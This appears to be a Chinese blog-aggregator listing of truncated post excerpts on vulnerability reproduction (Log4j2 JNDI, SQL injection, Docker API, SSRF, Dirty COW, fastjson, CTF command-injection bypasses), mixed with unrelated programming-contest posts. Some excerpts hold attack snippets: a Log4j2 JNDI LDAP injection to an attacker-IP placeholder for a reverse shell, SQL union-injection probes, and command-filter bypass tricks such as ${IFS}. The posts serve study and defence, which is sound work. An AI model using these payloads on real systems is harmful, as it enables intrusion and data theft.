漏洞2015 5254 cve

log4j2漏洞复现

【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba ......
漏洞 log4j2 log4 log 4j

《渗透测试》WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等 2022 Day26

#Oracle 参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 测回显:and 1=2 union select '1','2' from dual 爆库:and 1=2 union select '1',(select table ......
amp 漏洞 Mongodb Oracle Sqlmap

Docker API 未授权访问漏洞

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。 ......
漏洞 Docker API

数仓安全测试之SSRF漏洞

摘要:SSRF (Server-Side Request Forgery,服务器端请求伪造)是指由攻击者构造请求,然后利用服务器的漏洞以服务端的身份向内网发送请求对内网发起攻击。 本文分享自华为云社区《GaussDB(DWS)安全测试之SSRF漏洞》,作者: ACBD。 1. 什么是SSRF漏洞 S ......
漏洞 SSRF

PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)

PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814) 概述 PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞 pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件 FreeBSD 是一种类UNIX操作系统 pfBlockerN ......
pfBlockerNG 漏洞 PfSense 31814 2022

脏牛漏洞原理

漏洞概述 dirty cow漏洞是一种发生在写时复制的竞态条件产生的漏洞 写时复制(copy on write) 允许不同进程中的虚拟内存映射到相同物理内存页面的技术 三个重要流程 A:制作映射内存的副本 B:更新页表,是的虚拟内存指向新创建的物理内存 C 写入内存 tips:他们可以被其他线程中断 ......
漏洞 原理

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)

漏洞主要来自于 iotdb-web-workbench​ IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench​ 中存在不正确的身份验证漏洞。 ......

showDoc漏洞

攻击者使用showDoc的漏洞传播僵尸网络 近日,阿里云安全团队基于威胁情报挖掘网络攻击日志的过程中,发现了使用showDoc漏洞传播僵尸网络和挖矿软件的攻击事件,使用该手法传播僵尸网络暂未被公开报告过。 ShowDoc是一个在线文档分享工具,面向开发者提供针对API接口的文档编写与团队协作功能。早 ......
漏洞 showDoc

基于mysqludf_sys.so漏洞的提权

基于mysqludf_sys.so漏洞的提权 有时候目标机里会存在mysqludf_sys.so文件,那即表示数据库里可能存在用户自定义的功能函数。 UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数 ......
mysqludf_sys 漏洞 mysqludf sys so

HNCPC2015

#多边形的公共部分 ##分析: 求多边形面积交模板题 ##实现: #include <bits/stdc++.h> using namespace std; #define mst(x, y) memset(x, y, sizeof x) #define endl '\n' #define INF ......
HNCPC 2015

小皮Windows web面板漏洞详解

PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 小皮 Windows web 面板存在存储型 xss 漏洞,结合后台计划任务即可实现 RCE。 ......
漏洞 面板 Windows web

《渗透测试》WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL 2022 Day25

1 mysql一些命令介绍 1 load_file() 通过select load_file('xx.xx');读取文件 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allow ......
amp PostgreSQL 漏洞 MYSQL MSSQL

关于根据大佬的 (D-Link DSL-3782 的 CVE-2022-34527 漏洞分析)

关于根据大佬的 (D-Link DSL-3782 的 CVE-2022-34527 漏洞分析) 第一步、提取固件并分析 使用binwalk提取DSL-3782路由器的固件文件, binwalk -Me DSL-3782_A1_EU_1.01_07282016.bin 然后就可以在系统文件里面随意分析 ......
漏洞分析 漏洞 D-Link 34527 3782

fastjson漏洞利用

基础预备 JNDI java name and directory invoke JNDI是一组应用程序接口 提供了查找和访问命名和目录服务的通用,统一接口 java name and Directory interface RMI RMI 远程方法调用 依赖JRMP Java remote mes ......
漏洞 fastjson

变量覆盖--duomicms通杀漏洞

下载源码本地测试 然后进行代码审计 发现这个地方可能存在变量覆盖:/duomiphp/common.php查看包含了common.php的地方 先看看后台登录的地方,调用了common.phplogin.php查看了一下,没有可以构造变量的地方。但是login.php包含了check.admin.p ......
变量 漏洞 duomicms

【漏洞复现】Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

#【漏洞复现】Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228) 0x01 漏洞描述 Apache Log4j2 是一个基于 Java 的日志记录工具, 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可 ......
漏洞 Apache Log4j2 lookup 44228

《渗透测试》WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移 2022 Day24

1 前置知识: -SQL注入漏洞产生原理分析 攻击者利用服务器中的web应用程序将带有恶意的SQL语句作为Web表单中的参数提交 到服务器,服务器所接受的程序又将带有恶意的SQL语句作为SQL语句中的一个参数执行, 这样根据程序返回的结果攻击者可获得想知道的数据 -SQL注入漏洞危害利用分析 漏洞产 ......
amp 漏洞 ACCESS MYSQL 2022

浅析Nginx文件解析漏洞

浅析Nginx文件解析漏洞 本文章将从五个维度对Nginx文件解析漏洞进行剖析——原理、危害、检测、防御、复现 1、原理 ​ Nginx文件解析漏洞的产生原因是由于Nginx配置文件default.conf以及PHP配置文件php.ini的错误配置。 ​ 引发该漏洞的错误配置分别如下: Nginx ......
漏洞 文件 Nginx

P5072 [Ynoi2015] 盼君勿忘

~~第一道 Ynoi 也可能是最后一道了~~ 题面的意思挺简洁,对于每一次询问的 $l,r$ 求所有的子区间内的元素和,其中子区间内的元素要去重再进行求和。 首先我们可以想到,对于一个长度为 $n$ 序列的子区间个数是 $2^{n}$,如果要是里面全都是一个数 $a^{i}$ 的话,那么对于 $1, ......
P5072 5072 2015 Ynoi

CVE-2017-10271

Weblogic“wls-wsat”组件在反序列化操作时使用了Oracle官方的JDK组件中“XMLDecoder”类进行XML反序列化操作引发了代码执行XMLDecoder 类用于读取使用 XMLEncoder 创建的 XML 文档 ......
10271 2017 CVE

ChatGPT 出现严重技术漏洞,“当红炸子鸡”翻车了?

ChatGPT翻车了吗? 最近爆火的ChatGPT出现了严重技术漏洞,用户在社交媒体上表示看到了其他人的历史搜索记录标题。 一名推特用户21日发文称,“如果你使用ChatGPT请小心!你的聊天记录可能会被分享给其他用户!今天,我看到了另一个用户的聊天记录。我无法看到内容,但可以看到他们近期的聊天记录 ......
炸子鸡 漏洞 ChatGPT 技术

2015-CS

2015-CS 数据库部分 create table [EMPLOYEE]( [EmpNo] varchar(10) not null primary key, [EmpName] varchar(10) not null, [EmpSex] varchar(5) check([EmpSex]='男 ......
2015 CS

洛谷 P8026 [ONTAK2015] Bajtocja

简要题意 有 $d$ 张初始为空的无向图,每张中都有 $n$ 个点,标号从 $1$ 到 $n$,$m$ 次操作,每次往一张图加一条边,并询问有多少有序数对 $(a, b)$ 使得在全部的 $d$ 张图中 $a, b$ 联通。 数据范围:$1\le d \le 200, 1\le n \le 5000 ......
Bajtocja P8026 ONTAK 8026 2015

AY-漏洞

Hadoop漏洞 1、Hadoop 未授权访问【原理扫描】 | 漏洞名称 | Hadoop 未授权访问【原理扫描】 | CVE编号 | | | | | | | | 危险等级 | 高 | | | |威胁分类 | 远程信息泄露| | | | 漏洞描述 | Hadoop是一个由Apache基金会所开发的分 ......
漏洞 AY

Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析

Apache Kafka是一个开源的分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。 ......
漏洞 Apache 25194 Kafka 2023

SCOI2015 情报传递 主席树+LCA

哈哈哈哈老婆我有出息了,犬犬第一次从思路到代码都是自己一发切了紫题呢~ 好了一眼数据结构。 考虑如何转化第i个时刻有威胁的情报员,若能产生威胁 则说明他们至少在i-c-1这个时刻"出生" 也就是转化为在权值线段树上查询[1,i-c-1]有多少个人。 启发了我们可以先把未来的情报员都弄下来,再记一个他 ......
情报 主席 SCOI 2015 LCA

反序列化漏洞 之 CC1链(审计分析)

反序列化前提 1、被序列化和反序列化的类需要实现 Serializable 序列化 接口 2、并重写 readObject 方法,在重写的 readObject 方法中执行 objectInputStream.defaultReadObject 方法(否则无法读取序列化时属性的值) 3、具体原因这里 ......
序列 漏洞 CC1 CC

JNDI RMI 远程访问(LOG4j2漏洞底层原理)

JDK 版本 8u112 客户端(模拟被攻击的网站) 服务端(注册 RMI 服务,给被攻击网站提供 RMI 服务) 服务端 IP 192.168.3.175 恶意类(客户端发送请求给服务端,服务端再请求恶意类予以返回) 需要先将恶意类编译成 class 文件再存放到网站上,再通过命令开启服务 恶意类 ......
底层 漏洞 原理 LOG4j2 JNDI

ctf-文件执行漏洞(绕过)

考察知识点: 文件执行漏洞 空格特殊字符、flag字符绕过空格绕过 ${IFS} ${IFS}$1 $IFS$1 <和<> {cat,flag} %20替换 %0a (换行) %0d (回车) %09 (tab黑名单(关键字)绕过单引号、双引号绕过:c"at"t fl''ag反斜线绕过:ca\t f ......
漏洞 文件 ctf

qt+msvc2015 配置文件中文乱码

有个配置文件 config.ini,里面有中文项。 我知道windows上消除中文乱码的方法:https://www.cnblogs.com/warmlight/p/12341673.html 但是现在考虑到跨平台,我不能在跨平台的时候再去改文件编码格式为utf8bom啊。 胡乱试了下,发现这样可以 ......
乱码 文件 msvc 2015 qt